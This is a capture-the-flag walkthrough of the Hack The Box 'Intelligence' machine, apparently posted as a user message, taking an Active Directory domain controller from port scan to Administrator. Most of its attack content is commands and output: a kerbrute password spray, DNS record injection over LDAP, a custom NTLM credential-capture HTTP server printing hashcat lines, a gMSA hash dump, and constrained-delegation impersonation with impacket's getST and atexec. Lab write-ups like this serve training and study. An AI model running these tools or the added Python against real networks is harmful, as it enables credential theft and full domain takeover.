User:
First, let's check which ports are open with an nmap service scan:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-04 02:22:39Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-04T02:24:09+00:00; +7h00m02s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-04T02:24:08+00:00; +7h00m02s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-04T02:24:09+00:00; +7h00m02s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-04T02:24:08+00:00; +7h00m02s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
49700/tcp open msrpc Microsoft Windows RPC
56490/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m01s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-07-04T02:23:30
|_ start_date: N/A
This is clearly an Active Directory domain controller (Kerberos, LDAP, SMB with signing required, and dc.intelligence.htb in the certificates; also note the 7-hour clock skew, it matters later for Kerberos), but before anything else let's check the website:
There are links to two PDFs (/documents/2020-01-01-upload.pdf and /documents/2020-12-15-upload.pdf).
They contain nothing useful, just lorem ipsum text. What does look interesting is the naming scheme, "<date>-upload.pdf", so I used Burp Intruder with a list of dates as the payload to look for more valid PDFs:
Once Intruder finished I filtered out the non-200 responses and saved the result table (payload column only) to a file, so the list can be used to download every PDF:
# one request per date from the saved Intruder payload column; the PDFs live under /documents/ on port 80
while read -r d; do wget -q "http://intelligence.htb/documents/$d-upload.pdf"; done < wordlists
There are two PDFs without lorem ipsum text in them:
New Account Guide (/documents/2020-06-04-upload.pdf):
Internal IT Update (/documents/2020-12-30-upload.pdf):
The guide gives us a default password (NewIntelligenceCorpUser9876) but no usernames yet, so we take those from the PDFs' metadata: every document carries its author in the Creator field, and exiftool can print just that value:
# -s3 prints values only, so no grep/awk is needed; the result is the spray list used below
exiftool -Creator -s3 pdfs/*.pdf | sort -u > authors.txt
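As an added example (not code from the original walkthrough), here is the same enumeration as one Python script: it generates every date in a range in the site's naming scheme, probes /documents/<date>-upload.pdf, and pulls the /Creator entry out of each PDF's Info dictionary, which is the field exiftool prints as Creator. The fetcher is injectable, so the script runs offline against a constructed in-memory site (SAMPLE_SITE, made-up PDFs with usernames as Creator) and can be pointed at the real host with the urllib fetcher at the bottom; the date range 2020-01-01..2020-12-31 is an assumption taken from the two dates seen on the page.

```python
import re
from datetime import date, timedelta
from typing import Callable, Dict, Iterable, List, Optional

BASE = "http://intelligence.htb/documents/"  # where the two known PDFs live


def date_wordlist(start: date, end: date) -> List[str]:
    """Every YYYY-MM-DD from start to end inclusive, the site's file-name scheme."""
    return [(start + timedelta(days=i)).isoformat() for i in range((end - start).days + 1)]


def year_dates(year: int) -> List[str]:
    """Whole-year wordlist (2020 is assumed here from the dates seen on the site)."""
    return date_wordlist(date(year, 1, 1), date(year, 12, 31))


def find_pdfs(dates: Iterable[str], fetch: Callable[[str], Optional[bytes]]) -> Dict[str, bytes]:
    """Request <BASE><date>-upload.pdf for each date and keep the ones that exist.
    `fetch` returns the body, or None for a non-200 response (injectable for offline use)."""
    found: Dict[str, bytes] = {}
    for d in dates:
        body = fetch(f"{BASE}{d}-upload.pdf")
        if body is not None and body.startswith(b"%PDF"):
            found[d] = body
    return found


# /Creator followed by a literal string "(...)" (with \-escapes) or a hex string "<...>"
_CREATOR = re.compile(rb"/Creator\s*(\((?:[^()\\]|\\.)*\)|<[0-9A-Fa-f\s]*>)", re.S)


def pdf_creator(pdf: bytes) -> Optional[str]:
    """Return the /Creator entry of the PDF Info dictionary (what exiftool shows as Creator)."""
    m = _CREATOR.search(pdf)
    if not m:
        return None
    raw = m.group(1)
    if raw.startswith(b"<"):
        data = bytes.fromhex(raw[1:-1].decode("ascii"))
    else:
        data = re.sub(rb"\\(.)", rb"\1", raw[1:-1])  # unescape \( \) \\
    if data.startswith(b"\xfe\xff"):  # UTF-16BE text string with BOM
        return data[2:].decode("utf-16-be")
    return data.decode("latin-1")  # PDFDocEncoding is close enough for ASCII names


def authors(pdfs: Dict[str, bytes]) -> List[str]:
    """Unique Creator names across the downloaded PDFs, sorted: the spray list."""
    return sorted({c for c in map(pdf_creator, pdfs.values()) if c})


# --- constructed sample data so the script runs offline (not real box content) ---
def _fake_pdf(creator: str, hex_string: bool = False) -> bytes:
    lit = b"<" + creator.encode().hex().encode() + b">" if hex_string else b"(" + creator.encode() + b")"
    return b"%PDF-1.4\n1 0 obj\n<< /Creator " + lit + b" /Producer (test) >>\nendobj\n%%EOF\n"


SAMPLE_SITE = {
    BASE + "2020-01-01-upload.pdf": _fake_pdf("Example.User"),
    BASE + "2020-06-04-upload.pdf": _fake_pdf("Tiffany.Molina", hex_string=True),
    BASE + "2020-12-30-upload.pdf": _fake_pdf("Ted.Graves"),
}


def http_fetch(url: str) -> Optional[bytes]:
    """Real fetcher: body on 200, None on any HTTP error (404 for dates with no upload)."""
    import urllib.error
    import urllib.request
    try:
        with urllib.request.urlopen(url, timeout=10) as r:
            return r.read()
    except urllib.error.HTTPError:
        return None


if __name__ == "__main__":
    pdfs = find_pdfs(year_dates(2020), SAMPLE_SITE.get)  # swap in http_fetch to hit the real host
    print("\n".join(authors(pdfs)))
```

Against the real host, `find_pdfs(year_dates(2020), http_fetch)` makes 366 requests; the `startswith(b"%PDF")` check guards against a 200 that is really an error page.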
Finally we find which user the password belongs to by spraying it with kerbrute (one password against every user keeps each account at a single failed attempt, well below any lockout threshold, but each failure is still logged on the DC as a Kerberos pre-authentication failure, event 4771):
kerbrute passwordspray --dc dc.intelligence.htb -d intelligence.htb authors.txt NewIntelligenceCorpUser9876
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 07/05/21 - Ronnie Flathers @ropnop
2021/07/05 07:47:26 > Using KDC(s):
2021/07/05 07:47:26 > dc.intelligence.htb:88
2021/07/05 07:47:26 > [+] VALID LOGIN: Tiffany.Molina@intelligence.htb:NewIntelligenceCorpUser9876
2021/07/05 07:47:26 > Done! Tested 30 logins (1 successes) in 0.426 seconds
At this point we can test this credential against multiple services:
- SMB
- WinRM
- LDAP
SMB worked, and the user flag is on Tiffany.Molina's desktop in the Users share; we can read it straight to stdout with:
smbclient -E -U Tiffany.Molina%NewIntelligenceCorpUser9876 //10.10.10.248/Users -c 'get \\Tiffany.Molina\\Desktop\\user.txt /dev/fd/1' 2>/dev/null | cat
Root
Additionally there is the following file in the IT share from SMB:
So if we can add a hostname under intelligence.htb that points to our machine, the script will authenticate to us and we can capture Ted.Graves's credentials.
The first thing I found for this was the dnscmd command, but it runs on the DC and Tiffany.Molina can't get a shell through Evil-WinRM. After some investigating (and a nudge) I found a post mentioning krbrelayx, whose dnstool.py can, among other things, create DNS records over LDAP; AD-integrated DNS lets any authenticated domain user create records by default:
python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p NewIntelligenceCorpUser9876 -a add -r websample.intelligence.htb -d 10.10.15.193 10.10.10.248
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
/home/jusepe/Documents/HackTheBox/Machines/Intelligence/krbrelayx/dnstool.py:241: DeprecationWarning: please use dns.resolver.Resolver.resolve() instead
res = dnsresolver.query(zone, 'SOA')
[-] Adding new record
[+] LDAP operation completed successfully
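What dnstool.py does under the hood, as an added example (not code from krbrelayx or the original post): the record is a DNS_RPC_RECORD blob (MS-DNSP 2.3.2.2) stored in the dnsRecord attribute of a dnsNode object under the zone in the DomainDnsZones partition, and creating that object is an ordinary LDAP add that Authenticated Users may perform by default. The serial should be the zone's current SOA serial (dnstool fetches it with the SOA query visible in the output above, hence the DeprecationWarning); the value 0x12 used here, the `name`/`dNSTombstoned` attributes and the ldap3 import in the sending helper are assumptions.

```python
import ipaddress
import struct
from typing import Dict, Tuple

DNS_TYPE_A = 1
RANK_ZONE = 0xF0           # authoritative record inside a primary zone
DNS_RECORD_VERSION = 5     # MS-DNSP: Version MUST be 5
HEADER = "<HHBBHL"         # DataLength, Type, Version, Rank, Flags, Serial
HEADER_LEN = 24            # ... + TtlSeconds(4) + Reserved(4) + TimeStamp(4)


def pack_a_record(ip: str, serial: int, ttl: int = 180) -> bytes:
    """Serialise a DNS_RPC_RECORD of type A as stored in the dnsRecord attribute."""
    data = ipaddress.IPv4Address(ip).packed
    blob = struct.pack(HEADER, len(data), DNS_TYPE_A, DNS_RECORD_VERSION, RANK_ZONE, 0, serial)
    blob += struct.pack(">L", ttl)      # TtlSeconds is the one big-endian field in the structure
    blob += struct.pack("<LL", 0, 0)    # Reserved, TimeStamp (0 = static record, never aged out)
    return blob + data


def unpack_record(blob: bytes) -> Dict[str, object]:
    """Decode one dnsRecord value; enough to audit what is already in a zone."""
    length, rtype, version, rank, flags, serial = struct.unpack_from(HEADER, blob, 0)
    (ttl,) = struct.unpack_from(">L", blob, 12)
    (timestamp,) = struct.unpack_from("<L", blob, 20)
    data = blob[HEADER_LEN:HEADER_LEN + length]
    rec: Dict[str, object] = {"type": rtype, "version": version, "rank": rank, "flags": flags,
                              "serial": serial, "ttl": ttl, "timestamp": timestamp}
    if rtype == DNS_TYPE_A and length == 4:
        rec["address"] = str(ipaddress.IPv4Address(data))
    else:
        rec["data"] = data
    return rec


def dns_node_add(zone: str, name: str, ip: str, serial: int, domain_dn: str) -> Tuple[str, Dict[str, object]]:
    """DN and attributes of the LDAP add that creates <name>.<zone> as an A record."""
    dn = f"DC={name},DC={zone},CN=MicrosoftDNS,DC=DomainDnsZones,{domain_dn}"
    attrs: Dict[str, object] = {
        "objectClass": ["top", "dnsNode"],
        "name": name,
        "dNSTombstoned": "FALSE",
        "dnsRecord": [pack_a_record(ip, serial)],
    }
    return dn, attrs


def send_with_ldap3(dc: str, user: str, password: str, dn: str, attrs: Dict[str, object]) -> bool:
    """Perform the add with ldap3 (third-party dependency, imported only when actually sending)."""
    from ldap3 import NTLM, Connection, Server
    conn = Connection(Server(dc), user=user, password=password, authentication=NTLM, auto_bind=True)
    attributes = {k: v for k, v in attrs.items() if k != "objectClass"}
    return conn.add(dn, attrs["objectClass"], attributes)


if __name__ == "__main__":
    dn, attrs = dns_node_add("intelligence.htb", "websample", "10.10.15.193", 0x12, "DC=intelligence,DC=htb")
    print(dn)
    print(unpack_record(attrs["dnsRecord"][0]))
    # send_with_ldap3("10.10.10.248", r"intelligence.htb\Tiffany.Molina", "NewIntelligenceCorpUser9876", dn, attrs)
```

The record stays in the zone until someone deletes it, so remove it when done (dnstool.py -a remove); a defender can spot this kind of addition by watching for dnsNode objects created by ordinary user accounts.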
At this point I made an attempt to catch the credentials with a plain netcat listener on port 80:
nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.15.193] from (UNKNOWN) [10.10.10.248] 64132
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1852
Host: websample
Connection: Keep-Alive
That is only an unauthenticated GET: a raw listener never answers, so the PowerShell client is never challenged and never sends credentials (and a Negotiate client can't get a Kerberos ticket for a hostname that has no SPN, so once challenged it falls back to NTLM). Responder's HTTP server replies with a 401 NTLM challenge, which is exactly what triggers the credential exchange:
Responder captures a NetNTLMv2 challenge-response for Ted.Graves, which I cracked with hashcat (-m 5600) and rockyou:
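Why netcat shows only a bare GET while Responder gets a hash, as an added example (not Responder's code nor the original post's): the client only sends credentials after a 401 with WWW-Authenticate: NTLM, and it sends them as an NTLM AUTHENTICATE_MESSAGE whose NTProofStr is an HMAC-MD5 over our server challenge, so the challenge has to be recorded next to it for hashcat. The listener below issues the challenge, decodes the type 3 message and prints the -m 5600 line (or -m 5500 if a client answers with NTLMv1); build_type3 is the client side of the exchange, included only to exercise the parser with constructed values, and the advertised host/domain names and flag set are assumptions.

```python
import base64
import os
import struct
from http.server import BaseHTTPRequestHandler, HTTPServer

NTLMSSP = b"NTLMSSP\x00"
# UNICODE | REQUEST_TARGET | NTLM | TARGET_TYPE_DOMAIN | EXTENDED_SESSIONSECURITY | TARGET_INFO | VERSION | 128 | 56
FLAGS = 0xA2890205
VERSION = struct.pack("<BBH", 10, 0, 19041) + b"\x00\x00\x00\x0f"   # cosmetic Version field


def _fields(data: bytes, offset: int) -> bytes:
    """Len/MaxLen/Offset triple that points at `data` inside the message payload."""
    return struct.pack("<HHL", len(data), len(data), offset)


def _read(msg: bytes, at: int) -> bytes:
    ln, _mx, off = struct.unpack_from("<HHL", msg, at)
    return msg[off:off + ln]


def build_type2(challenge: bytes, target: str = "DC", domain: str = "INTELLIGENCE") -> bytes:
    """CHALLENGE_MESSAGE (MS-NLMP 2.2.1.2) carrying our 8-byte server challenge."""
    assert len(challenge) == 8
    target_name = target.encode("utf-16-le")
    av = b"".join(struct.pack("<HH", av_id, len(v)) + v                       # MsvAvNbDomainName, MsvAvNbComputerName
                  for av_id, v in ((2, domain.encode("utf-16-le")), (1, target_name)))
    av += struct.pack("<HH", 0, 0)                                            # MsvAvEOL
    msg = NTLMSSP + struct.pack("<L", 2) + _fields(target_name, 56)           # 56 = size of the fixed part
    msg += struct.pack("<L", FLAGS) + challenge + bytes(8)                    # flags, ServerChallenge, Reserved
    msg += _fields(av, 56 + len(target_name)) + VERSION
    return msg + target_name + av


def build_type3(user: str, domain: str, workstation: str, nt_response: bytes, lm_response: bytes = bytes(24)) -> bytes:
    """AUTHENTICATE_MESSAGE (2.2.1.3) as the client lays it out; constructed here only to test the parser."""
    parts = [lm_response, nt_response] + [s.encode("utf-16-le") for s in (domain, user, workstation)] + [b""]
    msg, off = NTLMSSP + struct.pack("<L", 3), 88                             # 88 = size of the fixed part
    for p in parts:                                  # LM, NT, Domain, User, Workstation, SessionKey fields
        msg += _fields(p, off)
        off += len(p)
    return msg + struct.pack("<L", FLAGS) + VERSION + bytes(16) + b"".join(parts)   # flags, Version, MIC, payload


def type3_to_hashcat(type3: bytes, challenge: bytes) -> str:
    """Turn the client's answer into a hashcat line: -m 5600 (NetNTLMv2) or -m 5500 (NetNTLMv1)."""
    if type3[:8] != NTLMSSP or struct.unpack_from("<L", type3, 8)[0] != 3:
        raise ValueError("not an NTLM AUTHENTICATE_MESSAGE")
    lm, nt = _read(type3, 12), _read(type3, 20)
    enc = "utf-16-le" if struct.unpack_from("<L", type3, 60)[0] & 1 else "ascii"   # NEGOTIATE_UNICODE
    domain, user = _read(type3, 28).decode(enc), _read(type3, 36).decode(enc)
    if len(nt) > 24:   # NTLMv2: 16-byte NTProofStr = HMAC-MD5(key, challenge || blob), then the blob
        return f"{user}::{domain}:{challenge.hex()}:{nt[:16].hex()}:{nt[16:].hex()}"
    return f"{user}::{domain}:{lm.hex()}:{nt.hex()}:{challenge.hex()}"


class NtlmCaptureHandler(BaseHTTPRequestHandler):
    """401 everything with an NTLM challenge; log the hashcat line when the type 3 arrives."""
    protocol_version = "HTTP/1.1"     # NTLM is bound to the TCP connection, so keep-alive is required
    challenge = os.urandom(8)
    captured: list = []

    def do_GET(self):
        auth = self.headers.get("Authorization", "")
        token = base64.b64decode(auth[5:]) if auth.startswith("NTLM ") else b""
        if token[8:12] == struct.pack("<L", 3):
            line = type3_to_hashcat(token, self.challenge)
            self.captured.append(line)
            print(line, flush=True)
            self._reply(200)
        else:   # no token -> bare "NTLM" (what netcat never sent); type 1 -> our type 2
            self._reply(401, "NTLM " + base64.b64encode(build_type2(self.challenge)).decode() if token else "NTLM")

    def _reply(self, code: int, www_auth: str = "") -> None:
        self.send_response(code)
        if www_auth:
            self.send_header("WWW-Authenticate", www_auth)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *_):
        pass


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 80), NtlmCaptureHandler).serve_forever()   # port 80 needs root
```

Running it in place of `nc -lvnp 80` and re-triggering the script yields one line per authenticating client that goes straight into `hashcat -m 5600`.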
The Internal IT Update PDF told us that service accounts are in use, so I looked into whether that was exploitable and found two resources on attacking Kerberos constrained delegation:
As the posts explain, “Attribute msds-allowedtodelegateto identifies the SPNs of services the user spot is trusted to delegate to”. So I used LDAP to find which account has that attribute set, and what it is allowed to delegate to:
# -x forces a simple bind with Ted's password; -H replaces the deprecated -h
ldapsearch -x -H ldap://10.10.10.248 -b "dc=intelligence,dc=htb" -D "Ted.Graves@intelligence.htb" -w "Mr.Teddy" | grep msDS-AllowedToDelegateTo
msDS-AllowedToDelegateTo: WWW/dc.intelligence.htb
svc_int$ is a group managed service account (gMSA), so nobody types its password, but the DC hands out the current one as msDS-ManagedPassword to whoever is listed in the account's msDS-GroupMSAMembership, and Ted.Graves is. gMSADumper reads it and prints the NT hash:
python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
svc_int$:::d64b83fe606e6d3005e20ce0ee932fe2
With that hash we can impersonate Administrator through S4U2Self + S4U2Proxy: getST requests a service ticket for WWW/dc.intelligence.htb on behalf of Administrator, which svc_int$ is allowed to do because that SPN is in its msDS-AllowedToDelegateTo (and, as the ticket we eventually get shows, Administrator is not protected from delegation here):
impacket-getST intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator
Impacket v0.9.24.dev1+20210706.140217.6da655ca - Copyright 2021 SecureAuth Corporation
[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great
Kerberos rejects requests whose timestamp is more than 5 minutes off the KDC's clock, and nmap already showed a 7-hour skew, so we sync our clock with the DC and re-run getST:
sudo net time set -S intelligence.htb
getST writes the ticket to Administrator.ccache; we point the Kerberos tooling at it:
export KRB5CCNAME=Administrator.ccache
Finally we can execute commands as Administrator with that ticket. It was issued for WWW/dc.intelligence.htb, yet atexec (DCE/RPC over SMB) accepts it: the target only checks that the ticket decrypts with its own machine account key and never validates the service class in the SPN, so a ticket for any SPN on the DC works against any service on the DC:
impacket-atexec -k -no-pass dc.intelligence.htb 'whoami && ipconfig'
Impacket v0.9.24.dev1+20210706.140217.6da655ca - Copyright 2021 SecureAuth Corporation
[!] This will work ONLY on Windows >= Vista
[*] Creating task \tfiHspSg
[*] Running task \tfiHspSg
[*] Deleting task \tfiHspSg
[*] Attempting to read ADMIN$\Temp\tfiHspSg.tmp
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::9473:360f:c80a:40d3
Link-local IPv6 Address . . . . . : fe80::9473:360f:c80a:40d3%6
IPv4 Address. . . . . . . . . . . : 10.10.10.248
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:30b0%6
10.10.10.2